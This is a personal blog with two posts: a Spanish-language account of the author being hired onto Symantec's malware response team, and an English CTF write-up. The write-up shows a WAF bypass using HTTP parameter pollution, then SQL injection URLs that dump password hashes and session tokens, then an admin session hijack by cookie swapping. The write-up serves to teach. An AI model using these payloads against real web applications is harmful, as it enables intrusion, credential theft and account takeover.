Sunday, October 14, 2012

Como llegue a uno de los equipos de Seguridad mas reconocidos en el Mundo.


Definitivamente, el hecho de llegar al equipo de Seguridad (Security Response Team) de Symantec encargado en combatir los virus y todo tipo de codigo malicioso a nivel mundial ha sido el mayor logro en mi carrera profesional, pero no hubiera sido posible llegar con mi propio esfuerzo, la mano de Dios estubo alli conmigo todo el tiempo y es una experiencia que quiero dejar para la eternidad. Aqui, la cronologia de los hechos.



Nota: Perdon por la falta de acentos, mi teclado esta en ingles y ni como agregarlos :-)

Mayo 31, 2012. 9:00 AM:

Solo como contexto, este dia 31 es mi cumpleaños y yo estaba siendo entrevistando en Microsoft! Si, en Redmond Seattle, fue una experiencia padrisima pero al final no hubo interes para contratarme, en este tiempo yo estaba buscando dar un salto a una compañia grande, de echo, tambien tuve platicas con Google Security Team pero tampoco se concreto nada y por si fuera poco, Symantec tambien me habia rechazado aunque no en el equipo de Seguridad sino en otro departamento, entonces perdi las esperanzas de unirme a un Gigante de TI y entonces empece a aplicar a excelentes Compañias pero fuera del rango que yo pretendia en un principio.

Julio 2, 2012, 3:15 PM:

Liam Murchu Manager del Equipo de Seguridad de Symantec (Security Response Team) publica este twitter anunciando que estaban contratando Analizadores de Codigo malicioso (malware analysts) en el soleado California:




Yo habia recibido este tweet ya que seguia los mensajes del equipo de Seguridad de Symantec y Liam envio este mensaje ha dicho grupo, en otras palabras yo no seguia los tweets de Liam, y para ser honestos ni siquiera sabe quien era el.

Cuando vi este tweet alrededor de las 11:00 PM del 3 de Julio (un dia despues de ser publicado) me emocione mucho ya que volvian mis esperanzas, aunque por mi mente pasaba “va a ser igual que en Microsoft, requeriran un gran nivel y por ende no estare a la altura”, pero de cualquier manera, investigue quien era Liam Murchu, consegui su correo electronico y le envie mi curriculum el mismo dia a las 11:55 PM. 
Mi correo mas que pedirle una entrevista fue una suplica para que me diera la oportunidad de trabajar con el considerando que mis conocimientos en analisis de Virus no eran avanzados pero que era el hombre mas motivado que jamas encontraria y que trabajaria dia y noche para darle los resultados esperados.

Inmediatamente despues, me acorde que tenia el correo de la persona “Adri” de recursos humanos de Symantec que me habia contactado para la oportunidad de trabajo anterior de la cual no habia sido seleccionado, le pedi de la forma mas atenta que por favor enviara mi curriculum a el de recurso de recursos humanos asignado para la contratacion dicho puesto.

Julio 5, 12:07 PM:

“Adri” de Symantec me contesta diciendome que ha enviado mi curriculum a la persona correspondiente y que si habia algun interes, ellos me contactarian. Yo le agradezco mucho a “Adri” y la bendigo en el nombre de Dios.

Julio 5, 12:13 PM:

Vean la hora, notese que fueron 6 minutos despues de agradecerle a “Adri”, recibo una llamada de “Lore” de recursos humanos de Symantec!!!!!!! No lo podia creer, ella me baja de mis nubes diciendome que el candidato YA CASI esta seleccionado pero que de cualquier manera me esta hablando por cortesia para hacerme saber que intentara enviar mi curriculum a Liam, argumentando que en ocasiones raras, los Managers pueden abrir mas vacantes o si no, pues ella me llamaria en cuanto hubiera otra oportunidad.

Julio 5, 15:33 PM:

Alrededor de 3 horas despues del mismo dia, me vuelve a llamar “Lore”, mas emocionada que yo! Y me dice que Liam esta interesado en platicar conmigo! Aunque me dice que la vacante es para una posicion Junior donde el salario esta un 25% por debajo de lo que yo actualmente percibo. Yo ya estaba avanzado en platicas con otra Empresa asi que mi intencion era saber hasta donde hubiera llegado con Symantec y si ellos hubieran estado interesados en mi, como que en el fondo de mi Corazon no habia ninguna esperanza de que me contrataran. Entrar en el equipo lider en analisis de virus con basica experiencia en ese campo? No lo veia posible.

Julio 9, 2012, 12:00 PM:

Liam y con un colega me marcan para la entrevista tecnica, yo inmediatamente me sincero y le digo que llevo poco tiempo en esa especialidad de analisis de virus pero que mi experiencia en otros campos de la seguridad me pueden ayudar a aprender rapido, entonces Liam me dice que me hara unas entrevistas basicas para ver si tengo nocion del puesto. Despues de dichas preguntas, me dice que parece que no estoy tan mal y que le gustaria una segunda entrevista con un alto grado tecnico solo para saber exactamente el nivel de mis conocimientos. Cuelgo el telefono y lo primero que pense fue… “me van a masacrar en la siguiente entrevista, no solo diran que no soy apto para el puesto sino que nisiquiera tengo los conocimientos basicos!!!!”.

Julio 9, 2012, 4:34PM:

“Lore” me habla, otra vez emocionada para decirme que me fue bien en mi entrevista! y que mi siguiente entrevista tecnica sera el proximo 12 de Julio.

Julio 12, 2012, 12:30 PM:

Me habla Liam, me presenta a su experto, me dice muy amablemente que no me preocupe, que empezaran con preguntas basicos e iran subiendo el nivel de complejidad hasta donde vean que ya no puedo pero que solo sea sincero con mis respuestas, que no intente adivinar y que no importa si no se algunas preguntas. 

La mano de Dios se vuelve a hacer presente, para mi gran sorpresa, las preguntas se centran en ataques y temas de seguridad pero nada relacionado con Analisis de Virus, despues me muestran codigo en C y Ensamblador y me piden que les explique que es lo que hacen y que falla pueden tener, me va muy bien, flaqueo un poco en Ensamblador pero bien, finalmente me hacen unas preguntas de Sistemas Operativos y despues de 2 horas de preguntas y ejercicios me dice Liam: “Daniel, hemos terminado con la entrevista, me permites un momento?”, me pone en espera y... despues de unos segundos, regresa Liam y me dice:

 “Daniel, el nivel que mostraste definitivamente no era el que esperabamos, consideramos que estas a un nivel mas Senior y por ende tratare de cambiar la vacante a una posicion un poco mas alta para tratar de que el salario mejore aunque no sea lo que tu pretendes, en cuanto tenga una respuesta te la hare saber.”

Yo le agradezco a Liam infinitamente, le hago saber mi emocion por la noticia y cuelgo el telefono.
Cuando colgue esa llamada me cayo el “20” de que Symantec estaba interesado en mi!!!!!! Y entonces todo cambio, en ese momento decidi que alli queria estar y que ojala y le pudieran aprobar el nuevo puesto para que mi salario no estuviera tan afectado considerando que el nivel de vida en California es muucho mas caro que en Chicago.
Sabia que esta oportunidad era unica, posiblemente no se presentaria de nuevo en mi vida, y aunque asi fuese, la experiencia necesaria para entrar seria un obstaculo importante, y es que en Empresas como Symantec, Microsoft o Google, son tan particulares que es dificil tener el nivel de conocimientos requerido, por citar un ejemplo, en que otra empresa del mundo estarias lidiando con un error en el codigo fuente de office? Solo en Microsoft!!!, comunmente la gente empieza de cero, contratada recien egresada de la Universidad, ahi se desarrolla, ahi aprende, ahi se vuelven expertos, la otra opcion es cuando eres un genio en cuyo caso estas Empresas te convencen para que trabajes con ellos, pero este scenario es muy raro y por ende solo para algunos, pero para los mortales como yo, que venimos de afuera (otro pais), es dificil tener el mismo nivel y convencer en las entrevistas. Por eso, lo repito siempre, la mano de Dios se hizo presente, Dios me habia dado esta oportunidad y debia tomarla a como de lugar.

Julio 17, 2012, 07:14 PM:

Despues de varios dias de incertidumbre! Llega el tan anciado correo de Liam el cual dice: 

“Desafortunadamente no podemos incrementar el salario para esta vacante en este momento, tal vez en el futuro tengamos una posicion mas cercana a tus habilidades, te contactare si se da la oportunidad. Mientras tanto, deseo que encuentres un trabajo que te permita seguir en el campo de Analisis de Virus…”

Exacto… asi como se quedaron me quede yo, no solo fue la mala noticia sino que tambien se estaba despidiendo de mi!
Despues de una hora pensando decidi pedirle que me contratara para el puesto actual, sin importar que el salario estaba muy por debajo de lo que yo ganaba, Liam contesta que podemos platicar al respecto y que me marcara el Miercoles 18 de Julio.
Cuando escucho esto, me vuelvo a poner contento y estoy casi seguro que solo es cuestion de formalizar mi contratacion.

Julio 18, 2012, 06:00 PM:

Llega el dia! Me habla Liam, me empieza a explicar los detalles del puesto pero como si estubiera tratando de convencerme de no tomarlo! frases como: “El salario es TODAVIA mas bajo de lo que habiamos platicado, no tienes derecho a bono, etc, etc”. Para que se den una idea, el salario propuesto era un poquito mas de lo que ganaba cuando llegue a USA en 2008 (4 años antes), solo que habia una importante diferencia: Ese salario era en Memphis, Tennessee donde el costo de vida es muchisisisisimo mas bajo que en California (la renta en Memphis era de $900 USD cuando en California es de $2200! Por ejemplo).
En fin, con todo y todo, que le digo a Liam: “Ok, me gusta, quiero el puesto, que me dices?”. 

En este momento yo esperaba una respuesta como: “Perfecto, formalizemos esto, o algo asi”, al final, quien no quiere a algo bueno y barato no? (asumiendo que el decia que yo tenia un nivel por encima del puesto vacante). Pero su respuesta de Liam fue muy diferente: 
“Ok, entonces pues… mmmm… dejame ver como esta la situacion porque ya estaban avanzadas las platicas con otro candidato, pero te resuelvo al final de esta semana”.

Entonces colgue muy triste, me habia dado cuenta que ni pidiendo entrar a Symantec sin sueldo seria aceptado, otra vez a nada de ser contratado y con todos los sueños en el aire, derepente todo se desmoronaba. Me fui a casa, muy pensativo, y entonces me entro un poco de dignidad y decidi darle las gracias a Liam, asi que que le escribi un correo diciendole: “Me emocione tanto de entrar a Symantec que puse a un lado los intereses de mi familia, con el sueldo propuesto y sin bono, definitivamente no puedo soportar los gastos en California, con el sueldo propuesto inicialmente mas un bono podria ser la unica opcion que me funcionaria. Estoy triste porque en verdad que me queria unir a tu equipo. Por favor dejame saber si en el futuro se habre un puesto a mis necesidades. Gracias por todo”.

Despues de enviar este correo, honestamente ya no esperaba ninguna respuesta, de hecho ya estaba convencido de que era la mejor decision e incluso estaba a punto de aceptar la oferta de otra Empresa que estaba esperando mi respuesta 2 semanas antes!!!!

Julio 19, 2012, 07:21 PM:

Me contesta Liam un dia despues y me dice que si estoy  de acuerdo “Lore” de recursos humanos me hablara para ver si podemos llegar a un acuerdo.
Otra vez vuelve la incertidumbre, sin idea de que queria Liam, pero esta vez sin esperar buenas noticias quedo en espera de la llamada.

Julio 20, 2012, 03:00 PM:

Este dia es muy especial porque fue cuando cumpli el primer mes de novio con el amor de mi vida y que ahora es mi esposa… Diana. Solo queria comentarlo...

Me habla “Lore” y me dice: “Daniel estamos interesados en que trabajes para Symantec, te respetaremos el salario propuesto inicialmente y te daremos un bono extra tratando de acercarnos un poco a tus expectativas economicas, mas estos y otros beneficios, que dices?”, yo acepto inmediatamente!!!! "Lore" y yo super contentos, y finalmente me dice que espere la carta formal en siguiente dia!

Cuelgo el telefono y no grite porque estaba en la oficina pero tenia un gusto inexplicable en mi Corazon y le agradeci a Dios tanto tanto por ser tan bueno conmigo, el trabajo de mis suenos se habia concretado mientras yo me reenamoraba de mi carrera professional la cual ya estaba a unos minutos de firmar el divorcio con la misma.

Gracias Dios! Para ti toda la Gloria y toda la honra. 

Octubre 14, 2012,  11:40 PM:

Hoy a 2 meses de trabajar para Symantec les puedo decir que reafirmo que Dios me puso este trabajo, los compañeros son estupendos y muy talentosos, mi jefe genial, la ciudad Culver City fantastica, hermosa, me voy todos los dias caminando al trabajo disfrutando de la creacion! En fin, era lo que Dios tenia preparado para mi.

AMEN. 

Wednesday, October 3, 2012

Bypassing WAF via HTTP Parameter Pollution


Last week I was invited to join a team to participate in a CTF (Capture The Flag) contest organized by CSAW Team.

With my wife and kids around, I only had the opportunity to pick one challenge related to Web Exploitation named: "HorceForce" worth 300 points! Basically, you were provided with a low-privilege account and needed to find your way to get Administrator access.

So, there are multiple resources explaining how to exploit it, but definitely I want to share my experience.

After sending some single quotes it was easy to find a SQL Injection bug by getting the well known "MySQL SQL Error Message".

So, as you all know the first attempt was something like:

http://128.238.66.217/horse.php?id=7 or 1 IN (select current_user)

And I got I ERROR Message saying something like "PLEASE STOP trying to hack this blablablabla site".

Then after many techniques to bypass the filter I realized the WAF was configured to deny any string containing either "select" or "union", blindly I assumed the WAF's regular expression was something like:

/^.*select.*$/ or /^.*union.*$/ 

Which means, every string which even makes no sense from SQLi point of view like: blablaSELECTblabla or a bypass technique like: /*!union*/ , were triggering the Warning Message.

After some research I found the HTTP Pollution technique which basically allows the attacker (among other things) to play with the GET Parameters in order to confuse the WAF filter.

So, how it works?

Let's say you have the GET parameter "id", you can duplicate it (or even add it many times) and send something like:

?id=value1&id=value2

And, depending on the Framework used (PHP, Java, ASP.NET, etc) the parameters are going to be parsed differently, in our case with Apache/PHP, if you inject the same parameter multiple times, only the last one will be parsed by the Framework (see table below) but guess what? Only the first parameter is going to be analyzed by the WAF!

This means, by injecting: ?id=7&id=[SQLi]

WAF Network Layer parses         id=7              <- Good to go!
PHP Application Layer parses       id=[SQLi]     <- SQLi successfully injected

So, this is a typical example where you can inject something that is going to be treated differently at Network Layer and Application Layer.

Below is a table where you can find how other Frameworks react when receiving the same parameter multiple times. Like ASP.NET, if it receives two parameters, it will concatenate them, and therefore you can split the attack into those fields to bypass the WAF, which is out of scope of this blog.




So, then my next try was to inject something like:

128.238.66.217/horse.php?id=0&id=7%20union%20select%201,2,3,current_user

You can notice, all the injection is taking place in the second parameter, which is not being parsed by the WAF and voila!!! I got my first successful response:

csaw_chal1@localhost

After that, all is simple SQLi to enumerate tables:

128.238.66.217/horse.php?id=0&id=7%20union%20select%20table_name,2,3,4%20from%20information_schema.tables%20limit%201

horses
sessions
users


Then get fields from table users:
128.238.66.217/horse.php?id=0&id=7 union select 1,2,3,column_name from information_schema.columns where table_name='users' limit 200

Description: user_id
Description: username
Description: password
Description: name
Description: level


And then dump the username and password trying to identify the Administrator password:

Description: administrator
Pass: $2a$08$kF9H1vqa.fogHc2JwbFNweay.sgdksbiuB9f7MN5mNZgcG6y7BrFG

Description: michael_vick
Pass: $2a$08$B2fI59Zzph61LajSSgkoB.i0YJ9HH8wBobmExxqPxl/.0Zu3Tijm2

Description: csaw_challenger
Pass: $2a$08$zFI9j/fsHKKbV0UCiavNveEIIi./v8lsqiaKxTV3T3BkrBk4XvSEK

Description: beefsister33
$2a$08$AUAeUut7FjkdCMfQJUuJwulgnBLbbTc0F/njHbl3mn59IS6OyADbO

Description: nuclear_grandma
$2a$08$edsWdwf45DDC4Vb2VPiikOspNpr3ePS5VE7z3aYsuMEZyodbkHRDK

Description: teabag_swag
Pass: $2a$08$uN4sFJ73Quf/b5hC3GxXIO53ewJ0W71c2Vuh4f2x.pr3iTrChvNOK


But unfortunately, those passwords were encrypted, but if you remember, there was a table named "sessions", so let's dump its content:

128.238.66.217/horse.php?id=0&id=7%20union%20select%201,2,3,session%20from%20sessions%20limit%20200

Description: bsv30irdq0PCvJxJrCAxROcmdXaUiwgQtPeg5J75EYgrH8jyHQ
Description: hbpnEGKo2WeLvQuQL0kb8vyyOHMn96ZYAROXmBggB6Pdr0FX4p
Description: VnRu2Zcv7REYTgHOqafggyYn3hA3cq1D9B4u4IxEcnB0TgPT4j
Description: UkOAVJ4ZAuX1t0Hib4maJccftZVeC4TdCZ8WxhQJZKqQ9axbwc
Description: 4gNszBZeSDjjKE5sSJwIcPOzTvhM90IR9JrqPa286tLfiDNDyp
Description: hmmJU3LrcIO7yJ77aSOsL9YIEjKITkOLg1CE0HF6Cnsbv2J077
Description: SL2v2sJvyu7Xw5Lc5b8UBSNFGOFhMfFrCWsgNGZZBSBfazpTlX




Then, you just go to your browser, use an Add-on like "Cookies Manager" from Firefox and change your current session value with one of the ones found above and ..... we got the Admin session:

bsv30irdq0PCvJxJrCAxROcmdXaUiwgQtPeg5J75EYgrH8jyHQ


Which give us the precious key: